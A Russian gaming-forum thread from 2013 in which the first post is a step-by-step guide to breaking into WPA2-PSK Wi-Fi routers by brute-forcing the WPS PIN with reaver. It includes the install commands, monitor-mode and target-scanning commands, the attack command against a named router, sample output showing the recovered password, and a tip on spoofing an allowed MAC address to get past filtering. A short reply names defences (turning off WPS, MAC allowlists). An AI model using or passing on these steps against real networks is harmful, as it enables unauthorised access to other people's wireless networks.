*Drive*- Здесь рулят padonki

*Drive* - Counter Strike Source
Текущее время: 16 июн 2019, 08:33

Часовой пояс: UTC + 3 часа [ Летнее время ]




Начать новую тему Ответить на тему  [ Сообщений: 3 ] 
Автор Сообщение
СообщениеДобавлено: 26 окт 2013, 20:33 
Не в сети
padonki
Аватар пользователя

Зарегистрирован: 14 авг 2006, 20:43
Сообщений: 3666
Откуда: Солнцево
Благодарил (а): 9 раз.
Поблагодарили: 48 раз.
Сейчас я покажу как взломать практически любую точку доступа или роутер Wi-Fi с типом шифрования WPA2-PSK менее чем за сутки:

До недавнего времени единственным способом как взломать Wi-Fi сеть с шифрованием WPA2-PSK был перебор всех возможных комбинаций пароля, либо атака по словарю, но для этого еще нужно было заполучить handshake с точки доступа. Процесс перебора занимает от нескольких часов до столетий, все зависит от сложности пароля и вычислительных мощностей взломщика. Например пароль вида Y3tAn0th (верхний, нижний регистр, цифры) на стандартном ПК с современным GPU (70000 вариантов в секунду ) подбирался бы 101 год. Но недавно нашли уязвимость, позволяющую найти ключ доступа менее чем за сутки, на моей системе и роутере D-link Dir-320 процесс занял 10 часов 40 минут. Лазейка обнаружилась в способе взломать WPS (Wi-Fi Protected Setup), это когда подключение к точке доступа осуществляется по 8-значному цифрому PIN-коду, который гораздо легче подобрать, причем данная фича включена по умолчанию на многих роутерах, включая популярные D-link Dir-615 и Dir-320 !

Подготовка взлома WPS

И так, для начала установим нужный софт, нам понадобиться:

aircrack-ng
reaver-wps

Все описанное будем проделывать в Ubuntu, либо можно использвать дистрибутив BackTrack 5, в репозиториях которого уже есть нужный софт. А для Ubuntu подключить репозитории BackTrack:
Код:
vim /etc/apt/sources.list

Добавим в конец файла следующее:

Код:
# Repository Backtrack
deb http://all.repository.backtrack-linux.org
deb http://all.repository.backtrack-linux.org revolution main microverse non-free testing
deb http://32.repository.backtrack-linux.org revolution main microverse non-free testing
deb http://source.repository.backtrack-linux.org revolution main microverse non-free testing

Экспортируем ключ безопастности репозитория:

Код:
wget -q http://all.repository.backtrack-linux.org/backtrack.gpg -O- | sudo apt-key add -


И обновим списки пакетов:

Код:
apt-get update


Ставим пакеты:

Код:
apt-get install aircrack-ng reaver


Взлом WPS:

Так как взломать Wi-Fi сеть WPA2-PSK ?

Переведем нашу карту в monitor mode

Код:
airmon-ng start wlan0


Должно быть примерное так:
Цитата:
Interface Chipset Driver wlan0 Ralink 2561 PCI rt61pci - [phy0] (monitor mode enabled on mon0)

Теперь найдем жертву

Код:
airodump-ng mon0


Будет список доступных сетей:
Цитата:
CH 5 ][ Elapsed: 12 s ][ 2012-05-17 16:45 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 1C:BD:B9:B5:C6:B9 -58 6 0 0 2 54 WPA2 TKIP PSK iformula.ru 193.240 BSSID STATION PWR Rate Lost Packets Probes


Проверим, включен ли WPS на точке

Код:
wash -i mon0


Начинаем перебор:

Код:
reaver -i mon0 -b 1C:BD:B9:B5:C6:B9 -a -vv


Где mon0 - имя виртуального интерфейса, далее мак адресс точки. -а - автоматически определять параметры взлома. -vv - диагностические сообщения

В результате пошел перебор пинов:

Цитата:
Reaver v1.4 WiFi Protected Setup Attack Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner cheffner@tacnetsol.com
[+] Waiting for beacon from 1C:BD:B9:B5:C6:B9
[+] Switching mon0 to channel 1
[+] Switching mon0 to channel 2
[+] Associated with 1C:BD:B9:B5:C6:B9 (ESSID: iformula.ru 193.240)
[+] Trying pin 12345670


В конечном итоге :

Цитата:
[+] WPS PIN: '80369424'
[+] WPA PSK: 'TryT0H4CkMe'
[+] AP SSID: 'iformula.ru 193.240'

видим как взлом Wi-Fi сети WPA2 успешно заверен.

Особо любознательные могут усовершенствовать перебор и сократить его время, изучив все возможности reaver:

Код:
reaver -h


Возможные проблемы:

- не появляется mon0 интерфейс: карточка или драйвер не поддерживают monitor mode

- В лог сыпятся строки [!] WARNING: Receive timeout occured: какая то проблема с wi-fi картой, причину я не смог найти, просто использовал другой адаптер.

- В логе [!] WARNING : Fialed to associate with XX:XX:XX:XX:XX:XX (ESSID: d-link) : на точке включена фильтрация по мак адресам. нужно сниферить нужный мак и ставить его себе. (airodump-ng)
Дополнительно:

Данный материал предназначен только в целях научного интереса и восстановления своего забытого пароля. Соблюдайте законодательство РФ. :)

_________________
Моя характеристика с детского сада: Хорошо кушает, спит, гуляет! Прошло много лет, ничего не изменилось.
Изображение


Вернуться наверх
 Профиль  
 
СообщениеДобавлено: 26 окт 2013, 21:53 
Не в сети
Аватар пользователя

Зарегистрирован: 15 июн 2009, 22:39
Сообщений: 814
Откуда: Moscow city
Благодарил (а): 7 раз.
Поблагодарили: 6 раз.
Как с этим бороться?

_________________
Изображение


Вернуться наверх
 Профиль  
 
СообщениеДобавлено: 26 окт 2013, 23:18 
Не в сети
padonki
Аватар пользователя

Зарегистрирован: 14 авг 2006, 20:43
Сообщений: 3666
Откуда: Солнцево
Благодарил (а): 9 раз.
Поблагодарили: 48 раз.
Отключать WPS , прописывать МАС адреса разрешённые...

_________________
Моя характеристика с детского сада: Хорошо кушает, спит, гуляет! Прошло много лет, ничего не изменилось.
Изображение


Вернуться наверх
 Профиль  
 
Показать сообщения за:  Сортировать по:  
Начать новую тему Ответить на тему  [ Сообщений: 3 ] 

Часовой пояс: UTC + 3 часа [ Летнее время ]


Кто сейчас на форуме

Сейчас этот форум просматривают: нет зарегистрированных пользователей и гости: 2


Вы не можете начинать темы
Вы не можете отвечать на сообщения
Вы не можете редактировать свои сообщения
Вы не можете удалять свои сообщения
Вы не можете добавлять вложения

Найти:
Перейти:  


Powered by -=PadonaK=- ®, Forum Drivesource.ru, Статситика игрового ресурса *Drive* HLstatsX, Система забаненых игроков Sourcebans

drivesource.ru ® 2006-2019